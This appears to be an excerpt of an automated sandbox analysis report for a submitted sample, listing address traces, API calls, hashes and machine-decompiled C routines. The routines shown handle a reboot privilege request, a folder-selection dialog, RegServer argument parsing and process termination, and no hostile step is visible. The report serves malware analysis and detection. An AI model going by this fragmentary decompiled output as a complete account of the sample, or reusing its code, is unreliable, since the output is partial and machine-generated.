                                                                                                                                                                                                      0x000e620a
                                                                                                                                                                                                      0x000e620b
                                                                                                                                                                                                      0x000e620e
                                                                                                                                                                                                      0x000e6217
                                                                                                                                                                                                      0x000e5d78
                                                                                                                                                                                                      0x000e5d78
                                                                                                                                                                                                      0x000e5d80
                                                                                                                                                                                                      0x000e5d83
                                                                                                                                                                                                      0x000e5d84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d84
                                                                                                                                                                                                      0x000e5d5d
                                                                                                                                                                                                      0x000e5d5f
                                                                                                                                                                                                      0x000e5d62
                                                                                                                                                                                                      0x000e5d68
                                                                                                                                                                                                      0x000e5d64
                                                                                                                                                                                                      0x000e5d64
                                                                                                                                                                                                      0x000e5d64
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d62
                                                                                                                                                                                                      0x000e5d5b
                                                                                                                                                                                                      0x000e5d4f
                                                                                                                                                                                                      0x000e5d1d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d9f
                                                                                                                                                                                                      0x000e5d9f
                                                                                                                                                                                                      0x000e5da5
                                                                                                                                                                                                      0x000e5dab
                                                                                                                                                                                                      0x000e5dba
                                                                                                                                                                                                      0x000e6218
                                                                                                                                                                                                      0x000e621d
                                                                                                                                                                                                      0x000e6220
                                                                                                                                                                                                      0x000e6221
                                                                                                                                                                                                      0x000e6229
                                                                                                                                                                                                      0x000e6230
                                                                                                                                                                                                      0x000e6247
                                                                                                                                                                                                      0x000e626a
                                                                                                                                                                                                      0x000e6272
                                                                                                                                                                                                      0x000e6249
                                                                                                                                                                                                      0x000e6255
                                                                                                                                                                                                      0x000e625f
                                                                                                                                                                                                      0x000e6264
                                                                                                                                                                                                      0x000e6264
                                                                                                                                                                                                      0x000e6284
                                                                                                                                                                                                      0x000e5dc0
                                                                                                                                                                                                      0x000e5dc0
                                                                                                                                                                                                      0x000e5dca
                                                                                                                                                                                                      0x000e5e22
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5dcc
                                                                                                                                                                                                      0x000e5dce
                                                                                                                                                                                                      0x000e5e24
                                                                                                                                                                                                      0x000e5e24
                                                                                                                                                                                                      0x000e5e2c
                                                                                                                                                                                                      0x000e5e47
                                                                                                                                                                                                      0x000e5e4a
                                                                                                                                                                                                      0x000e61d2
                                                                                                                                                                                                      0x000e61e2
                                                                                                                                                                                                      0x000e61e7
                                                                                                                                                                                                      0x000e61ee
                                                                                                                                                                                                      0x000e61f1
                                                                                                                                                                                                      0x000e61f1
                                                                                                                                                                                                      0x000e61f8
                                                                                                                                                                                                      0x000e61f8
                                                                                                                                                                                                      0x000e5e50
                                                                                                                                                                                                      0x000e5e53
                                                                                                                                                                                                      0x000e6109
                                                                                                                                                                                                      0x000e611f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6125
                                                                                                                                                                                                      0x000e6137
                                                                                                                                                                                                      0x000e613a
                                                                                                                                                                                                      0x000e613c
                                                                                                                                                                                                      0x000e613e
                                                                                                                                                                                                      0x000e613e
                                                                                                                                                                                                      0x000e6141
                                                                                                                                                                                                      0x000e6141
                                                                                                                                                                                                      0x000e6143
                                                                                                                                                                                                      0x000e6144
                                                                                                                                                                                                      0x000e614a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6150
                                                                                                                                                                                                      0x000e6152
                                                                                                                                                                                                      0x000e615c
                                                                                                                                                                                                      0x000e6170
                                                                                                                                                                                                      0x000e6172
                                                                                                                                                                                                      0x000e617c
                                                                                                                                                                                                      0x000e6190
                                                                                                                                                                                                      0x000e6190
                                                                                                                                                                                                      0x000e6196
                                                                                                                                                                                                      0x000e61a5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e61ab
                                                                                                                                                                                                      0x000e61b9
                                                                                                                                                                                                      0x000e61c6
                                                                                                                                                                                                      0x000e61c6
                                                                                                                                                                                                      0x000e617e
                                                                                                                                                                                                      0x000e6180
                                                                                                                                                                                                      0x000e618a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5ef7
                                                                                                                                                                                                      0x000e5ef2
                                                                                                                                                                                                      0x000e5f4c
                                                                                                                                                                                                      0x000e5f4e
                                                                                                                                                                                                      0x000e5f50
                                                                                                                                                                                                      0x000e5f54
                                                                                                                                                                                                      0x000e5ed4
                                                                                                                                                                                                      0x000e5ea2
                                                                                                                                                                                                      0x000e5ea4
                                                                                                                                                                                                      0x000e5eaf
                                                                                                                                                                                                      0x000e5eaf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e79
                                                                                                                                                                                                      0x000e5e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e83
                                                                                                                                                                                                      0x000e5e83
                                                                                                                                                                                                      0x000e5e83
                                                                                                                                                                                                      0x000e5e85
                                                                                                                                                                                                      0x000e5e85
                                                                                                                                                                                                      0x000e5e8e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5e94
                                                                                                                                                                                                      0x000e5e8e
                                                                                                                                                                                                      0x000e5e7d
                                                                                                                                                                                                      0x000e5e77
                                                                                                                                                                                                      0x000e5e6e
                                                                                                                                                                                                      0x000e5e65
                                                                                                                                                                                                      0x000e5e5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5dd0
                                                                                                                                                                                                      0x000e5dce
                                                                                                                                                                                                      0x000e5dca
                                                                                                                                                                                                      0x000e5dba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5d00
                                                                                                                                                                                                      0x000e5dd9
                                                                                                                                                                                                      0x000e5e04
                                                                                                                                                                                                      0x000e61fe
                                                                                                                                                                                                      0x000e5e0a
                                                                                                                                                                                                      0x000e5e0c
                                                                                                                                                                                                      0x000e5e17
                                                                                                                                                                                                      0x000e5e17
                                                                                                                                                                                                      0x000e5e04
                                                                                                                                                                                                      0x000e6200
                                                                                                                                                                                                      0x000e6200
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 000E5CEE
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(000E8B3E,00000104,00000000,?,?), ref: 000E5DFC
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 000E5E3E
                                                                                                                                                                                                      • CharUpperA.USER32(-00000052), ref: 000E5EE1
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 000E5F6F
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 000E5FA7
                                                                                                                                                                                                      • CharUpperA.USER32(-0000004E), ref: 000E6008
                                                                                                                                                                                                      • CharUpperA.USER32(?), ref: 000E60AA
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,000E1140,00000000,00000040,00000000), ref: 000E61F1
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 000E61F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                      • String ID: "$"$:$RegServer
                                                                                                                                                                                                      • API String ID: 1203814774-25366791
                                                                                                                                                                                                      • Opcode ID: 3332f24a7afd1fd2b1b0fcf1f896709a923378b19542c703801f9875806f322d
                                                                                                                                                                                                      • Instruction ID: a087be501d7ca63524275be81a1f20536576f65e2e0025f5af94103d8b26044c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3332f24a7afd1fd2b1b0fcf1f896709a923378b19542c703801f9875806f322d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CD19331A04AD45EEFB98B3B9C483FE37E1972634EF1848F9C496F6151DA758E818B01
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 60%
                                                                                                                                                                                                      			E000E1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				int _t28;
                                                                                                                                                                                                      				signed char _t30;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				void* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t41 = __esi;
                                                                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						if( *0xe9a40 != 0) {
                                                                                                                                                                                                      							_pop(_t30);
                                                                                                                                                                                                      							_t44 = _t46;
                                                                                                                                                                                                      							_t13 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                      							_push(_t38);
                                                                                                                                                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                      								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                      								_v12 = 2;
                                                                                                                                                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                      								CloseHandle(_v28);
                                                                                                                                                                                                      								_t41 = _t41;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                      										_t25 = 1;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t37 = 0x4f7;
                                                                                                                                                                                                      										goto L3;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t37 = 0x4f6;
                                                                                                                                                                                                      									goto L4;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t37 = 0x4f5;
                                                                                                                                                                                                      								L3:
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								L4:
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								E000E44B9(0, _t37);
                                                                                                                                                                                                      								_t25 = 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_pop(_t40);
                                                                                                                                                                                                      							return E000E6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t37 = 0x522;
                                                                                                                                                                                                      						_t28 = E000E44B9(0, 0x522, 0xe1140, 0, 0x40, 4);
                                                                                                                                                                                                      						if(_t28 != 6) {
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = E000E1EA7(__ecx);
                                                                                                                                                                                                      					if(__eax != 2) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						return _t28;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 000E1EFB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 000E1F02
                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 000E1FD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                      • API String ID: 2795981589-3733053543
                                                                                                                                                                                                      • Opcode ID: 9137a0dd8087de19090558a1bae02be3430812281fb5742e531c91e00d87c233
                                                                                                                                                                                                      • Instruction ID: 5b27f61ebbade4ab12924b2d6ef32b6f1965c040290f59cd2b7acf42f3060c24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9137a0dd8087de19090558a1bae02be3430812281fb5742e531c91e00d87c233
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6421BC71B402857FEB305BA29C49FFF77B8EB85B11F100029FA06F6181D779980196A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                      				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x000e6cf7
                                                                                                                                                                                                      0x000e6d00
                                                                                                                                                                                                      0x000e6d19

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E6E26,000E1000), ref: 000E6CF7
                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(000E6E26,?,000E6E26,000E1000), ref: 000E6D00
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,000E6E26,000E1000), ref: 000E6D0B
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,000E6E26,000E1000), ref: 000E6D12
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                      • Opcode ID: 9f7c7bb7c2c50494bdc90a6d62b4345f48ddce4859f00a6c9e60feb662357508
                                                                                                                                                                                                      • Instruction ID: 8adffcbb0b7596d9994749a0bdea88eb9412600cb790b87f899ec532720a976a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f7c7bb7c2c50494bdc90a6d62b4345f48ddce4859f00a6c9e60feb662357508
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5D0C932200188BBFB002BE1EC4CA593F28EB8FA12F454085F319AA020CA3A64518B52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                                                                      			E000E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				int _t20;
                                                                                                                                                                                                      				int _t21;
                                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                                      				char _t24;
                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                      				int _t27;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				int _t38;
                                                                                                                                                                                                      				int _t39;
                                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                                      				void* _t46;
                                                                                                                                                                                                      				CHAR* _t49;
                                                                                                                                                                                                      				void* _t58;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				struct HWND__* _t64;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t64 = _a4;
                                                                                                                                                                                                      				_t6 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                      					EndDialog(_t64, ??);
                                                                                                                                                                                                      					L39:
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 = 1;
                                                                                                                                                                                                      				_t10 = _t6 - 0x100;
                                                                                                                                                                                                      				if(_t10 == 0) {
                                                                                                                                                                                                      					E000E43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                      					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                      					__eflags =  *0xe9a40 - _t42; // 0x3
                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L36:
                                                                                                                                                                                                      					return _t42;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t10 == _t42) {
                                                                                                                                                                                                      					_t20 = _a12 - 1;
                                                                                                                                                                                                      					__eflags = _t20;
                                                                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0xe91e4, 0x104);
                                                                                                                                                                                                      						__eflags = _t21;
                                                                                                                                                                                                      						if(_t21 == 0) {
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							_t58 = 0x4bf;
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							E000E44B9(_t64, _t58);
                                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t49 = 0xe91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t23 =  *_t49;
                                                                                                                                                                                                      							_t49 =  &(_t49[1]);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      						} while (_t23 != 0);
                                                                                                                                                                                                      						__eflags = _t49 - 0xe91e5 - 3;
                                                                                                                                                                                                      						if(_t49 - 0xe91e5 < 3) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 =  *0xe91e5; // 0x3a
                                                                                                                                                                                                      						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0xe91e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E000E658A(0xe91e4, 0x104, 0xe1140);
                                                                                                                                                                                                      								_t27 = E000E58C8(0xe91e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0xe91e4 - 0x5c;
                                                                                                                                                                                                      									if( *0xe91e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E000E597D(0xe91e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xe91e5 - 0x5c;
                                                                                                                                                                                                      									if( *0xe91e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E000E44B9(_t64, 0x54a, 0xe91e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0xe91e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0xe91e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0xe91e4 - 0x5c;
                                                                                                                                                                                                      						if( *0xe91e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0xe9124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0xe9a3c, 0x3e8, 0xe8598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E000E4224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xe87a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E000E44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3329
                                                                                                                                                                                                      0x000e332b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e332b
                                                                                                                                                                                                      0x000e324c
                                                                                                                                                                                                      0x000e324c
                                                                                                                                                                                                      0x000e324f
                                                                                                                                                                                                      0x000e32c8
                                                                                                                                                                                                      0x000e32ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e32ce
                                                                                                                                                                                                      0x000e3251
                                                                                                                                                                                                      0x000e3256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3271
                                                                                                                                                                                                      0x000e3277
                                                                                                                                                                                                      0x000e3279
                                                                                                                                                                                                      0x000e3298
                                                                                                                                                                                                      0x000e329d
                                                                                                                                                                                                      0x000e329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e32b0
                                                                                                                                                                                                      0x000e32b6
                                                                                                                                                                                                      0x000e32b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e32be
                                                                                                                                                                                                      0x000e3280
                                                                                                                                                                                                      0x000e3289
                                                                                                                                                                                                      0x000e328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e328e
                                                                                                                                                                                                      0x000e327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,000E8598,00000200), ref: 000E3271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000E33E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 000E33F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 000E3410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 000E3426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 000E342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 000E343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
